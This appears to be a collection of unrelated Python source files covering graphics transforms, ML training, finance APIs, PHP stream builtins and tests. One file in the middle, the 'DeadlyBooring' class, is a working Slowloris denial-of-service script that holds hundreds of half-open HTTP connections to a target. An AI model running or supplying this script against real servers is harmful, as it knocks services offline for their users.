if word not in self.dict or pos not in self.dict[word]:
raise WordNotInDictionaryException()
word_candidate = self.dict[word][pos]
ret = []
for wd in word_candidate:
ret.append((wd, 1))
if self.k is not None:
ret = ret[ : self.k]
return ret
|
413602
|
import numpy as np
from .Transform import *
class TransformObject:
def __init__(self, local=None):
self.local = local if local is not None else Matrix4()
self.updated = True
self.left = WORLD_LEFT.copy()
self.up = WORLD_UP.copy()
self.front = WORLD_FRONT.copy()
self.pos = Float3()
self.rot = Float3()
self.euler_to_quat = QUATERNION_IDENTITY.copy()
self.quat = QUATERNION_IDENTITY.copy()
self.final_rotation = QUATERNION_IDENTITY.copy()
self.scale = Float3(1, 1, 1)
self.prev_pos = Float3()
self.prev_Rot = Float3()
self.prev_quat = QUATERNION_IDENTITY.copy()
self.prev_final_rotation = QUATERNION_IDENTITY.copy()
self.prev_Scale = Float3(1, 1, 1)
self.prev_pos_store = Float3()
self.quaternionMatrix = Matrix4()
self.eulerMatrix = Matrix4()
self.rotationMatrix = Matrix4()
self.matrix = Matrix4()
self.inverse_matrix = Matrix4()
self.prev_matrix = Matrix4()
self.prev_inverse_matrix = Matrix4()
self.update_transform(True)
def reset_transform(self):
self.updated = True
self.set_pos(Float3())
self.set_rotation(Float3())
self.set_quaternion(QUATERNION_IDENTITY)
self.set_final_rotation(QUATERNION_IDENTITY)
self.set_scale(Float3(1, 1, 1))
self.update_transform(True)
def clone(self, other_transform):
self.set_pos(other_transform.get_pos())
self.set_rotation(other_transform.get_rotation())
self.set_quaternion(other_transform.get_quaternion())
self.set_final_rotation(other_transform.get_final_rotation())
self.set_scale(other_transform.get_scale())
self.update_transform(True)
# Translate
def get_pos(self):
return self.pos
def get_prev_pos(self):
return self.prev_pos_store
def get_pos_x(self):
return self.pos[0]
def get_pos_y(self):
return self.pos[1]
def get_pos_z(self):
return self.pos[2]
def set_pos(self, pos):
self.pos[...] = pos
def set_prev_pos(self, prev_pos):
self.prev_pos[...] = prev_pos
def set_pos_x(self, x):
self.pos[0] = x
def set_pos_y(self, y):
self.pos[1] = y
def set_pos_z(self, z):
self.pos[2] = z
def move(self, pos):
self.pos[...] = self.pos + pos
def move_front(self, pos):
self.pos[...] = self.pos + self.front * pos
def move_left(self, pos):
self.pos[...] = self.pos + self.left * pos
def move_up(self, pos):
self.pos[...] = self.pos + self.up * pos
def move_x(self, pos_x):
self.pos[0] += pos_x
def move_y(self, pos_y):
self.pos[1] += pos_y
def move_z(self, pos_z):
self.pos[2] += pos_z
# Rotation
def get_rotation(self):
return self.rot
def get_pitch(self):
return self.rot[0]
def get_yaw(self):
return self.rot[1]
def get_roll(self):
return self.rot[2]
def set_rotation(self, rot):
self.rot[...] = rot
def set_pitch(self, pitch):
if pitch > TWO_PI or pitch < 0.0:
pitch %= TWO_PI
self.rot[0] = pitch
def set_yaw(self, yaw):
if yaw > TWO_PI or yaw < 0.0:
yaw %= TWO_PI
self.rot[1] = yaw
def set_roll(self, roll):
if roll > TWO_PI or roll < 0.0:
roll %= TWO_PI
self.rot[2] = roll
def rotation(self, rot):
self.rotation_pitch(rot[0])
self.rotation_yaw(rot[1])
self.rotation_roll(rot[2])
def rotation_pitch(self, delta=0.0):
self.rot[0] += delta
if self.rot[0] > TWO_PI or self.rot[0] < 0.0:
self.rot[0] %= TWO_PI
def rotation_yaw(self, delta=0.0):
self.rot[1] += delta
if self.rot[1] > TWO_PI or self.rot[1] < 0.0:
self.rot[1] %= TWO_PI
def rotation_roll(self, delta=0.0):
self.rot[2] += delta
if self.rot[2] > TWO_PI or self.rot[2] < 0.0:
self.rot[2] %= TWO_PI
# Quaternion
def get_final_rotation(self):
return self.final_rotation
def set_final_rotation(self, quat):
self.final_rotation[...] = quat
def get_quaternion(self):
return self.quat
def set_quaternion(self, quat):
self.quat[...] = quat
def axis_rotation(self, axis, radian):
self.multiply_quaternion(axis_rotation(axis, radian))
def multiply_quaternion(self, quat):
self.quat[...] = muliply_quaternion(quat, self.quat)
def normalize_quaternion(self):
self.quat[...] = normalize(self.quat)
def euler_to_quaternion(self):
euler_to_quaternion(*self.rot, self.quat)
# Scale
def get_scale(self):
return self.scale
def get_scale_x(self):
return self.scale[0]
def get_scale_y(self):
return self.scale[1]
def get_scale_z(self):
return self.scale[2]
def set_scale(self, scale):
self.scale[...] = scale
def set_scale_x(self, x):
self.scale[0] = x
def set_scale_y(self, y):
self.scale[1] = y
def set_scale_z(self, z):
self.scale[2] = z
def scale_xyz(self, scale):
self.scale_x(scale[0])
self.scale_y(scale[1])
self.scale_z(scale[2])
def scale_x(self, x):
self.scale[0] += x
def scale_y(self, y):
self.scale[1] += y
def scale_z(self, z):
self.scale[2] += z
def scaling(self, scale):
self.scale[...] = self.scale + scale
def matrix_to_vectors(self):
matrix_to_vectors(self.rotationMatrix, self.left, self.up, self.front, do_normalize=True)
# update Transform
def update_transform(self, update_inverse_matrix=False, force_update=False):
prev_updated = self.updated
self.updated = False
rotation_update = False
if any(self.prev_pos != self.pos) or force_update:
self.prev_pos_store[...] = self.prev_pos
self.prev_pos[...] = self.pos
self.updated = True
# Quaternion Rotation
if any(self.prev_quat != self.quat) or force_update:
self.prev_quat[...] = self.quat
self.updated = True
rotation_update = True
quaternion_to_matrix(self.quat, self.quaternionMatrix)
# Euler Roation
if any(self.prev_Rot != self.rot) or force_update:
self.prev_Rot[...] = self.rot
self.updated = True
rotation_update = True
matrix_rotation(self.eulerMatrix, *self.rot)
if rotation_update:
self.rotationMatrix[...] = np.dot(self.eulerMatrix, self.quaternionMatrix)
self.matrix_to_vectors()
if any(self.prev_Scale != self.scale) or force_update:
self.prev_Scale[...] = self.scale
self.updated = True
if prev_updated or self.updated:
self.prev_matrix[...] = self.matrix
if update_inverse_matrix:
self.prev_inverse_matrix[...] = self.inverse_matrix
if self.updated:
self.matrix[...] = self.local
transform_matrix(self.matrix, self.pos, self.rotationMatrix, self.scale)
if update_inverse_matrix:
# self.inverse_matrix[...] = np.linalg.inv(self.matrix)
self.inverse_matrix[...] = self.local
inverse_transform_matrix(self.inverse_matrix, self.pos, self.rotationMatrix, self.scale)
return self.updated
def get_transform_infos(self):
text = "\tPosition : " + " ".join(["%2.2f" % i for i in self.pos])
text += "\n\tRotation : " + " ".join(["%2.2f" % i for i in self.rot])
text += "\n\tFront : " + " ".join(["%2.2f" % i for i in self.front])
text += "\n\tLeft : " + " ".join(["%2.2f" % i for i in self.left])
text += "\n\tUp : " + " ".join(["%2.2f" % i for i in self.up])
text += "\n\tMatrix"
text += "\n\t" + " ".join(["%2.2f" % i for i in self.matrix[0, :]])
text += "\n\t" + " ".join(["%2.2f" % i for i in self.matrix[1, :]])
text += "\n\t" + " ".join(["%2.2f" % i for i in self.matrix[2, :]])
text += "\n\t" + " ".join(["%2.2f" % i for i in self.matrix[3, :]])
return text
|
413643
|
from winton_kafka_streams.state.factory.store_factory import StoreFactory
def create(name: str) -> StoreFactory:
# TODO replace this Java-esque factory with a Pythonic DSL as part of the other work on a Streams DSL
return StoreFactory(name)
|
413683
|
from arg_parser import lago_args
lago_args()
from arg_parser import UserArgs
from attribute_expert.model import AttributeExpert
from dataset_handler.data_loader import DataLoader
from utils import ml_utils
def main():
print("###################################")
print("#####Main Of Attributes Expert#####")
print("###################################")
# Get Prepared Data
data_loader = DataLoader(UserArgs.test_mode)
# remove samples from train set (hold-out set)
if not UserArgs.test_mode:
with ml_utils.temporary_random_seed(0):
import numpy as np
n_indexes = np.array([], dtype=int)
for class_idx in data_loader.train_classes:
indices = np.where(data_loader.Y_train == class_idx)[0]
if class_idx in data_loader.ms_classes:
# get rid of 1/5 of data for ms class
value = int(np.floor((4 / 5) * len(indices)))
else:
# get rid of 1/2 of data for fs class
value = int(np.floor((1 / 2) * len(indices)))
n_indexes = np.append(n_indexes,
np.random.choice(indices, value, replace=False))
data_loader.Y_train = data_loader.Y_train[n_indexes]
data_loader.X_train = data_loader.X_train[n_indexes, :]
data_loader.Y_train_oh = data_loader.Y_train_oh[n_indexes, :]
data_loader.Attributes_train = data_loader.Attributes_train[n_indexes, :]
print(data_loader.X_train.shape)
print(data_loader.Y_train.shape)
print(data_loader.Attributes_train.shape)
# Attribute Expert
att_model_name = UserArgs.att_model_name
att_model_variante = UserArgs.att_model_variant
attribute_expert_model = AttributeExpert(att_model_name, att_model_variante,
data_loader.input_dim, data_loader.categories_dim,
data_loader.attributes_dim,
data_loader.class_descriptions_crossval,
data_loader.attributes_groups_ranges_ids)
attribute_expert_model.compile_model(data_loader.train_classes)
attribute_expert_model.model.summary()
# train model
attribute_expert_model.fit_model(data_loader.X_train, data_loader.Y_train_oh,
data_loader.Attributes_train,
data_loader.X_val, data_loader.Y_val_oh,
data_loader.Attributes_val, data_loader.eval_params)
# Load best model
attribute_expert_model.load_best_model(with_hp_ext=True)
# Evaluate model
attribute_expert_model.evaluate_and_save_metrics(data_loader.train_data,
data_loader.val_data,
data_loader.test_data,
data_loader.test_eval_params,
plot_thresh=False,
should_save_predictions=False,
should_save_metrics=False)
main()
|
413693
|
import os
import sys
sys.path.append(os.path.split(os.path.realpath(__file__))[0])
from lightnlp.sp import TDP
tdp_model = TDP()
train_path = '../data/tdp/train.sample.txt'
dev_path = '../data/tdp/dev.txt'
vec_path = 'D:/Data/NLP/embedding/english/glove.6B.100d.txt'
tdp_model.train(train_path, dev_path=dev_path, vectors_path=vec_path,save_path='./tdp_saves',
log_dir='E:/Test/tensorboard/')
tdp_model.load('./tdp_saves')
tdp_model.test(dev_path)
from pprint import pprint
pprint(tdp_model.predict('Investors who want to change the required timing should write their representatives '
'in Congress , he added . '))
|
413701
|
set1 = {10, 20, 30, 40, 50}
set2 = {30, 40, 50, 60, 70}
set3 = set1.union(set2)
print(set3)
# set3 = {70, 40, 10, 50, 20, 60, 30}
# set1 y set2 se mantienen igual
|
413714
|
import requests
import pandas as pd
from gamestonk_terminal import config_terminal as cfg
def get_ipo_calendar(from_date: str, to_date: str) -> pd.DataFrame:
"""Get IPO calendar
Parameters
----------
from_date : str
from date (%Y-%m-%d) to get IPO calendar
to_date : str
to date (%Y-%m-%d) to get IPO calendar
Returns
-------
pd.DataFrame
Get dataframe with economic calendar events
"""
response = requests.get(
f"https://finnhub.io/api/v1/calendar/ipo?from={from_date}&to={to_date}&token={cfg.API_FINNHUB_KEY}"
)
if response.status_code == 200:
d_data = response.json()
if "ipoCalendar" in d_data:
d_refactor_columns = {
"numberOfShares": "Number of Shares",
"totalSharesValue": "Total Shares Value",
"date": "Date",
"exchange": "Exchange",
"name": "Name",
"price": "Price",
"status": "Status",
}
return pd.DataFrame(d_data["ipoCalendar"]).rename(
columns=d_refactor_columns
)
return pd.DataFrame()
|
413731
|
import socket, random, time, sys
class DeadlyBooring():
def __init__(self, ip, port=80, socketsCount = 200):
self._ip = ip
self._port = port
self._headers = [
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)",
"Accept-Language: en-us,en;q=0.5"
]
self._sockets = [self.newSocket() for _ in range(socketsCount)]
def getMessage(self, message):
return (message + "{} HTTP/1.1\r\n".format(str(random.randint(0, 2000)))).encode("utf-8")
def newSocket(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(4)
s.connect((self._ip, self._port))
s.send(self.getMessage("Get /?"))
for header in self._headers:
s.send(bytes(bytes("{}\r\n".format(header).encode("utf-8"))))
return s
except socket.error as se:
print("Error: "+str(se))
time.sleep(0.5)
return self.newSocket()
def attack(self, timeout=sys.maxsize, sleep=15):
t, i = time.time(), 0
while(time.time() - t < timeout):
for s in self._sockets:
try:
print("Sending request #{}".format(str(i)))
s.send(self.getMessage("X-a: "))
i += 1
except socket.error:
self._sockets.remove(s)
self._sockets.append(self.newSocket())
time.sleep(sleep/len(self._sockets))
if __name__ == "__main__":
dos = DeadlyBooring("192.168.0.236", 81, socketsCount=200)
dos.attack(timeout=60*10)
|
413771
|
import logging
from aiohttp.test_utils import AioHTTPTestCase
from saq.job import Status
from saq.worker import Worker
from saq.web import create_app
from tests.helpers import create_queue, cleanup_queue
logging.getLogger().setLevel(logging.CRITICAL)
async def echo(_ctx, *, a):
return a
functions = [echo]
class TestWorker(AioHTTPTestCase):
async def get_application(self):
self.queue1 = create_queue(name="queue1")
self.queue2 = create_queue(name="queue2")
self.worker = Worker(self.queue1, functions=functions)
return create_app(queues=[self.queue1, self.queue2])
async def asyncTearDown(self):
await cleanup_queue(self.queue1)
await cleanup_queue(self.queue2)
async def test_queues(self):
async with self.client.get("/api/queues") as resp:
self.assertEqual(resp.status, 200)
json = await resp.json()
self.assertEqual(
set(q["name"] for q in json["queues"]), {"queue1", "queue2"}
)
async with self.client.get(f"/api/queues/{self.queue1.name}") as resp:
self.assertEqual(resp.status, 200)
json = await resp.json()
self.assertEqual(json["queue"]["name"], "queue1")
async def test_jobs(self):
job = await self.queue1.enqueue("echo", a=1)
url = f"/api/queues/{self.queue1.name}/jobs/{job.key}"
await self.worker.process()
await job.refresh()
self.assertEqual(job.status, Status.COMPLETE)
async with self.client.get(url) as resp:
self.assertEqual(resp.status, 200)
json = await resp.json()
self.assertEqual(json["job"]["kwargs"], repr({"a": 1}))
self.assertEqual(json["job"]["result"], repr(1))
async with self.client.post(f"{url}/retry") as resp:
self.assertEqual(resp.status, 200)
await job.refresh()
self.assertEqual(job.status, Status.QUEUED)
async with self.client.post(f"{url}/abort") as resp:
self.assertEqual(resp.status, 200)
await job.refresh()
self.assertEqual(job.status, Status.ABORTED)
|
413804
|
from hippy import rpath
from hippy.objects.resources.file_resource import W_FileResource
from hippy.objects.base import W_Root
from hippy.builtin import (
wrap, Optional, FileResourceArg, StreamContextArg)
from hippy.objects.resources.socket_resource import W_SocketResource
from hippy.module.url import urlsplit
def set_socket_blocking():
""" Alias of stream_set_blocking"""
raise NotImplementedError()
def stream_bucket_append():
""" Append bucket to brigade"""
raise NotImplementedError()
def stream_bucket_make_writeable():
""" Return a bucket object from the brigade for operating on"""
raise NotImplementedError()
def stream_bucket_new():
""" Create a new bucket for use on the current stream"""
raise NotImplementedError()
def stream_bucket_prepend():
""" Prepend bucket to brigade"""
raise NotImplementedError()
def stream_context_create():
""" Creates a stream context"""
raise NotImplementedError()
def stream_context_get_default():
""" Retrieve the default stream context"""
raise NotImplementedError()
def stream_context_get_options():
""" Retrieve options for a stream/wrapper/context"""
raise NotImplementedError()
def stream_context_get_params():
""" Retrieves parameters from a context"""
raise NotImplementedError()
def stream_context_set_default():
""" Set the default stream context"""
raise NotImplementedError()
def stream_context_set_option():
""" Sets an option for a stream/wrapper/context"""
raise NotImplementedError()
def stream_context_set_params():
""" Set parameters for a stream/wrapper/context"""
raise NotImplementedError()
def stream_copy_to_stream():
""" Copies data from one stream to another"""
raise NotImplementedError()
def stream_encoding():
""" Set character set for stream encoding"""
raise NotImplementedError()
FILTERS = ['string.rot13', 'string.toupper', 'string.tolower',
'convert.base64-encode', 'convert.base64-decode',
'zlib.deflate', 'zlib.inflate',
'bzip2.compress', 'bzip2.decompress']
@wrap(['interp', FileResourceArg(False), str, Optional(int), Optional(W_Root)])
def stream_filter_append(interp, w_res, filtername, _type=1, w_params=None):
""" Attach a filter to a stream"""
assert isinstance(w_res, W_FileResource)
if not filtername in FILTERS:
interp.warn("stream_filter_append(): unable to "
"locate filter \"wrong_filter\"")
if _type == 1:
w_res.read_filters_append(filtername)
w_res.read_filters_params_append(w_params)
elif _type == 2:
w_res.write_filters_append(filtername)
w_res.write_filters_params_append(w_params)
elif _type == 3:
w_res.read_filters_append(filtername)
w_res.read_filters_params_append(w_params)
w_res.write_filters_append(filtername)
w_res.write_filters_params_append(w_params)
return w_res
def stream_filter_prepend():
""" Attach a filter to a stream"""
raise NotImplementedError()
def stream_filter_register():
""" Register a user defined stream filter"""
raise NotImplementedError()
def stream_filter_remove():
""" Remove a filter from a stream"""
raise NotImplementedError()
@wrap(['interp', FileResourceArg(False), Optional(int), Optional(int)])
def stream_get_contents(interp, w_res, max_length=-1, offset=-1):
""" Reads remainder of a stream into a string"""
assert isinstance(w_res, W_FileResource)
res = w_res.read(-1)
return interp.space.wrap(res)
def stream_get_filters():
""" Retrieve list of registered filters"""
raise NotImplementedError()
def stream_get_line():
""" Gets line from stream resource up to a given delimiter"""
raise NotImplementedError()
@wrap(['interp', FileResourceArg(False)])
def stream_get_meta_data(interp, w_res):
""" Retrieves header/meta data from streams/file pointers"""
return w_res.get_meta_data()
def stream_get_transports():
""" Retrieve list of registered socket transports"""
raise NotImplementedError()
def stream_get_wrappers():
""" Retrieve list of registered streams"""
raise NotImplementedError()
def stream_is_local():
""" Checks if a stream is a local stream"""
raise NotImplementedError()
def stream_notification_callback():
""" A callback function for the notification context paramater"""
raise NotImplementedError()
def stream_register_wrapper():
""" Alias of stream_wrapper_register"""
raise NotImplementedError()
@wrap(['interp', str])
def stream_resolve_include_path(interp, filename):
""" Resolve filename against the include path"""
for path in interp.include_path:
fullpath = rpath.join(path, [filename])
if rpath.exists(fullpath):
return interp.space.wrap(rpath.realpath(fullpath))
return interp.space.w_False
def stream_select():
""" Runs the equivalent of the select() system call
on the given arrays of streams with a
timeout specified by tv_sec and tv_usec"""
raise NotImplementedError()
def stream_set_blocking():
""" Set blocking/non-blocking mode on a stream"""
raise NotImplementedError()
def stream_set_chunk_size():
""" Set the stream chunk size"""
raise NotImplementedError()
def stream_set_read_buffer():
""" Set read file buffering on the given stream"""
raise NotImplementedError()
@wrap(['interp', FileResourceArg(), int, Optional(int)],
aliases=['socket_set_timeout'])
def stream_set_timeout(interp, w_res, sec, mili=0):
""" Set timeout period on a stream"""
if mili:
sec += mili / 1000000.0
w_res.settimeout(sec)
return interp.space.w_True
@wrap(['interp', FileResourceArg(), int])
def stream_set_write_buffer(interp, w_res, buffer):
""" Sets write file buffering on the given stream"""
### mockup only
return interp.space.newint(0)
@wrap(['interp', FileResourceArg(), Optional(float), Optional('reference')])
def stream_socket_accept(interp, w_res, timeout=-1, w_ref_peer=None):
""" Accept a connection on a socket created by stream_socket_server"""
space = interp.space
fd, addr = w_res.accept()
w_res = W_SocketResource(space, None, -1, fd=fd)
if timeout == -1:
w_timeout = interp.config.get_ini_w('default_socket_timeout')
timeout = interp.space.float_w(w_timeout)
w_res.settimeout(timeout)
return w_res
def stream_socket_client():
""" Open Internet or Unix domain socket connection"""
raise NotImplementedError()
def stream_socket_enable_crypto():
""" Turns encryption on/off on an already connected socket"""
raise NotImplementedError()
@wrap(['interp', FileResourceArg(), bool])
def stream_socket_get_name(interp, w_res, remote):
""" Retrieve the name of the local or remote sockets"""
return w_res.get_name(remote)
def stream_socket_pair():
""" Creates a pair of connected, indistinguishable socket streams"""
raise NotImplementedError()
def stream_socket_recvfrom():
""" Receives data from a socket, connected or not"""
raise NotImplementedError()
def stream_socket_sendto():
""" Sends a message to a socket, whether it is connected or not"""
raise NotImplementedError()
@wrap(['interp', str, Optional('reference'), Optional('reference'),
Optional(int), Optional(StreamContextArg(None))])
def stream_socket_server(interp, local_socket, w_ref_errno=None,
w_ref_errstr=None, flags=12, w_ctx=None):
""" Create an Internet or Unix domain server socket
('STREAM_SERVER_BIND', 4),
('STREAM_SERVER_LISTEN', 8),
"""
r = urlsplit(local_socket)
space = interp.space
bind = flags & 4 != 0
listen = flags & 8 != 0
w_res = W_SocketResource(space, r.host, r.port, r.scheme)
if bind:
w_res.bind()
if listen:
w_res.listen()
return w_res
# import pdb; pdb.set_trace()
def stream_socket_shutdown():
""" Shutdown a full-duplex connection"""
raise NotImplementedError()
def stream_supports_lock():
""" Tells whether the stream supports locking."""
raise NotImplementedError()
def stream_wrapper_register():
""" Register a URL wrapper implemented as a PHP class"""
raise NotImplementedError()
def stream_wrapper_restore():
""" Restores a previously unregistered built-in wrapper"""
raise NotImplementedError()
def stream_wrapper_unregister():
""" Unregister a URL wrapper"""
raise NotImplementedError()
|
413823
|
import torch
from fast_transformers.builders import TransformerEncoderBuilder, RecurrentEncoderBuilder
from fast_transformers.masking import TriangularCausalMask
from fit.transformers.PositionalEncoding2D import PositionalEncoding2D
class SResTransformerTrain(torch.nn.Module):
def __init__(self,
d_model,
coords, flatten_order,
attention_type="linear",
n_layers=4,
n_heads=4,
d_query=32,
dropout=0.1,
attention_dropout=0.1):
super(SResTransformerTrain, self).__init__()
self.fourier_coefficient_embedding = torch.nn.Linear(2, d_model // 2)
self.pos_embedding = PositionalEncoding2D(
d_model // 2,
coords=coords,
flatten_order=flatten_order,
persistent=False
)
self.encoder = TransformerEncoderBuilder.from_kwargs(
attention_type=attention_type,
n_layers=n_layers,
n_heads=n_heads,
feed_forward_dimensions=n_heads * d_query * 4,
query_dimensions=d_query,
value_dimensions=d_query,
dropout=dropout,
attention_dropout=attention_dropout
).get()
self.predictor_amp = torch.nn.Linear(
n_heads * d_query,
1
)
self.predictor_phase = torch.nn.Linear(
n_heads * d_query,
1
)
def forward(self, x):
x = self.fourier_coefficient_embedding(x)
x = self.pos_embedding(x)
triangular_mask = TriangularCausalMask(x.shape[1], device=x.device)
y_hat = self.encoder(x, attn_mask=triangular_mask)
y_amp = self.predictor_amp(y_hat)
y_phase = torch.tanh(self.predictor_phase(y_hat))
return torch.cat([y_amp, y_phase], dim=-1)
class SResTransformerPredict(torch.nn.Module):
def __init__(self, d_model, coords, flatten_order,
attention_type="full", n_layers=4, n_heads=4,
d_query=32, dropout=0.1,
attention_dropout=0.1):
super(SResTransformerPredict, self).__init__()
self.fourier_coefficient_embedding = torch.nn.Linear(2, d_model // 2)
self.pos_embedding = PositionalEncoding2D(
d_model // 2,
coords=coords,
flatten_order=flatten_order,
persistent=False
)
self.encoder = RecurrentEncoderBuilder.from_kwargs(
attention_type=attention_type,
n_layers=n_layers,
n_heads=n_heads,
feed_forward_dimensions=n_heads * d_query * 4,
query_dimensions=d_query,
value_dimensions=d_query,
dropout=dropout,
attention_dropout=attention_dropout
).get()
self.predictor_amp = torch.nn.Linear(
n_heads * d_query,
1
)
self.predictor_phase = torch.nn.Linear(
n_heads * d_query,
1
)
def forward(self, x, i=0, memory=None):
x = x.view(x.shape[0], -1)
x = self.fourier_coefficient_embedding(x)
x = self.pos_embedding.forward_i(x, i)
y_hat, memory = self.encoder(x, memory)
y_amp = self.predictor_amp(y_hat)
y_phase = torch.tanh(self.predictor_phase(y_hat))
return torch.cat([y_amp, y_phase], dim=-1), memory
|
413831
|
import argparse
import math
import threading
import time
import torch
import hivemind
from hivemind.proto import runtime_pb2
from hivemind.utils.limits import increase_file_limit
from hivemind.utils.logging import get_logger, use_hivemind_log_handler
from hivemind.utils.networking import LOCALHOST
use_hivemind_log_handler("in_root_logger")
logger = get_logger(__name__)
def sample_tensors(hid_size, num_layers):
tensors = []
for i in range(num_layers):
tensors.append(torch.randn(hid_size, 3 * hid_size))
tensors.append(torch.randn(3 * hid_size))
tensors.append(torch.randn(3 * hid_size))
tensors.append(torch.randn(hid_size, hid_size))
tensors.append(torch.ones(hid_size))
tensors.append(torch.zeros(hid_size))
tensors.append(torch.randn(hid_size, 4 * hid_size))
tensors.append(torch.randn(4 * hid_size))
tensors.append(torch.ones(4 * hid_size))
tensors.append(torch.randn(2, hid_size, hid_size, 2))
tensors.append(torch.randn(hid_size))
tensors.append(torch.randn(hid_size))
tensors.append(torch.randn(hid_size))
return tuple(tensors)
def benchmark_averaging(
num_peers: int,
target_group_size: int,
num_rounds: int,
averaging_expiration: float,
request_timeout: float,
round_timeout: float,
hid_size: int,
num_layers: int,
spawn_dtime: float,
):
dht_root = hivemind.DHT(start=True)
initial_peers = dht_root.get_visible_maddrs()
num_groups = 2 ** int(round(math.log2(num_peers / target_group_size)))
nbits = int(round(math.log2(num_groups)))
peer_tensors = [sample_tensors(hid_size, num_layers) for _ in range(num_peers)]
processes = {dht_root}
lock_stats = threading.Lock()
successful_steps = total_steps = 0
def run_averager(index):
nonlocal successful_steps, total_steps, lock_stats
dht = hivemind.DHT(initial_peers=initial_peers, start=True)
initial_bits = bin(index % num_groups)[2:].rjust(nbits, "0")
averager = hivemind.averaging.DecentralizedAverager(
peer_tensors[index],
dht,
prefix="my_tensor",
initial_group_bits=initial_bits,
compression_type=runtime_pb2.CompressionType.FLOAT16,
target_group_size=target_group_size,
averaging_expiration=averaging_expiration,
request_timeout=request_timeout,
start=True,
)
processes.update({dht, averager})
logger.info(
f"Averager {index}: started with peer id {averager.peer_id}, group_bits: {averager.get_group_bits()}"
)
for step in range(num_rounds):
try:
success = averager.step(timeout=round_timeout) is not None
except:
success = False
with lock_stats:
successful_steps += int(success)
total_steps += 1
logger.info(f"Averager {index}: {'finished' if success else 'failed'} step #{step}")
logger.info(f"Averager {index}: done.")
threads = []
for i in range(num_peers):
thread = threading.Thread(target=run_averager, args=[i])
threads.append(thread)
thread.start()
time.sleep(spawn_dtime)
t = time.time()
for thread in threads:
thread.join()
logger.info(f"Benchmark finished in {time.time() - t:.3f} seconds.")
logger.info(f"Success rate: {successful_steps / total_steps} ({successful_steps} out of {total_steps} attempts)")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--num_peers", type=int, default=16, required=False)
parser.add_argument("--target_group_size", type=int, default=4, required=False)
parser.add_argument("--num_rounds", type=int, default=5, required=False)
parser.add_argument("--hid_size", type=int, default=256, required=False)
parser.add_argument("--num_layers", type=int, default=3, required=False)
parser.add_argument("--averaging_expiration", type=float, default=5, required=False)
parser.add_argument("--round_timeout", type=float, default=15, required=False)
parser.add_argument("--request_timeout", type=float, default=1, required=False)
parser.add_argument("--spawn_dtime", type=float, default=0.1, required=False)
parser.add_argument("--increase_file_limit", action="store_true")
args = vars(parser.parse_args())
if args.pop("increase_file_limit", False):
increase_file_limit()
benchmark_averaging(**args)
|
413855
|
import torch
import numpy as np
import pickle
from configs.data_config import number_pnts_on_template
#initialize the weighs of the network for Convolutional layers and batchnorm layers
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(0.0, 0.02)
elif classname.find('BatchNorm') != -1:
m.weight.data.normal_(1.0, 0.02)
m.bias.data.fill_(0)
# load sphere faces and points
def load_template(number):
file_name = './data/sphere%d.pkl' % (number)
with open(file_name, 'rb') as file:
sphere_obj = pickle.load(file)
sphere_points_normals = torch.from_numpy(sphere_obj['v']).float()
sphere_faces = torch.from_numpy(sphere_obj['f']).long()
sphere_adjacency = torch.from_numpy(sphere_obj['adjacency'].todense()).long()
sphere_edges = torch.from_numpy(sphere_obj['edges']).long()
sphere_edge2face = torch.from_numpy(sphere_obj['edge2face'].todense()).type(torch.uint8)
return sphere_points_normals, sphere_faces, sphere_adjacency, sphere_edges, sphere_edge2face
sphere_points_normals, sphere_faces, sphere_adjacency, sphere_edges, sphere_edge2face = load_template(number_pnts_on_template)
def sample_points_on_edges(points, edges, quantity = 1, mode = 'train'):
n_batch = edges.shape[0]
n_edges = edges.shape[1]
if mode == 'train':
# if the sampling rate is larger than 1, we randomly pick points on faces.
weights = np.diff(np.sort(np.vstack(
[np.zeros((1, n_edges * quantity)), np.random.uniform(0, 1, size=(1, n_edges * quantity)),
np.ones((1, n_edges * quantity))]), axis=0), axis=0)
else:
# if in test mode, we pick the central point on faces.
weights = 0.5 * np.ones((2, n_edges * quantity))
weights = weights.reshape([2, quantity, n_edges])
weights = torch.from_numpy(weights).float().to(points.device)
weights = weights.transpose(1, 2)
weights = weights.transpose(0, 1).contiguous()
weights = weights.expand(n_batch, n_edges, 2, quantity).contiguous()
weights = weights.view(n_batch * n_edges, 2, quantity)
left_nodes = torch.gather(points.transpose(1, 2), 1,
(edges[:, :, 0] - 1).unsqueeze(-1).expand(edges.size(0), edges.size(1), 3))
right_nodes = torch.gather(points.transpose(1, 2), 1,
(edges[:, :, 1] - 1).unsqueeze(-1).expand(edges.size(0), edges.size(1), 3))
edge_points = torch.cat([left_nodes.unsqueeze(-1), right_nodes.unsqueeze(-1)], -1).view(n_batch*n_edges, 3, 2)
new_point_set = torch.bmm(edge_points, weights).contiguous()
new_point_set = new_point_set.view(n_batch, n_edges, 3, quantity)
new_point_set = new_point_set.transpose(2, 3).contiguous()
new_point_set = new_point_set.view(n_batch, n_edges * quantity, 3)
new_point_set = new_point_set.transpose(1, 2).contiguous()
return new_point_set
|
413857
|
import re
class MessageTranslator:
messages = {}
def __init__(self):
self.compiled_messages = {m: re.compile(m) for m in self.messages}
def translate_messages(self, messages):
return [self.translate_message(m) for m in messages]
def translate_message(self, message):
for target_message, pattern in self.compiled_messages.items():
pattern_found = pattern.search(message)
if pattern_found:
groups = pattern_found.groupdict()
return self.messages[target_message].format(**groups)
return message
|
413863
|
import unittest
from uuid import (
uuid4,
)
from minos.aggregate import (
Action,
Event,
FieldDiff,
FieldDiffContainer,
)
from minos.common import (
current_datetime,
)
from tests.utils import (
AggregateTestCase,
Car,
)
class TestRootEntityDifferences(AggregateTestCase):
async def asyncSetUp(self) -> None:
self.uuid = uuid4()
self.uuid_another = uuid4()
self.initial_datetime = current_datetime()
self.final_datetime = current_datetime()
self.another_datetime = current_datetime()
self.initial = Car(
3, "blue", uuid=self.uuid, version=1, created_at=self.initial_datetime, updated_at=self.initial_datetime
)
self.final = Car(
5, "yellow", uuid=self.uuid, version=3, created_at=self.initial_datetime, updated_at=self.final_datetime
)
self.another = Car(
3,
"blue",
uuid=self.uuid_another,
created_at=self.another_datetime,
updated_at=self.another_datetime,
version=1,
)
def test_diff(self):
expected = Event(
uuid=self.uuid,
name=Car.classname,
version=3,
action=Action.UPDATE,
created_at=self.final_datetime,
fields_diff=FieldDiffContainer([FieldDiff("doors", int, 5), FieldDiff("color", str, "yellow")]),
)
observed = self.final.diff(self.initial)
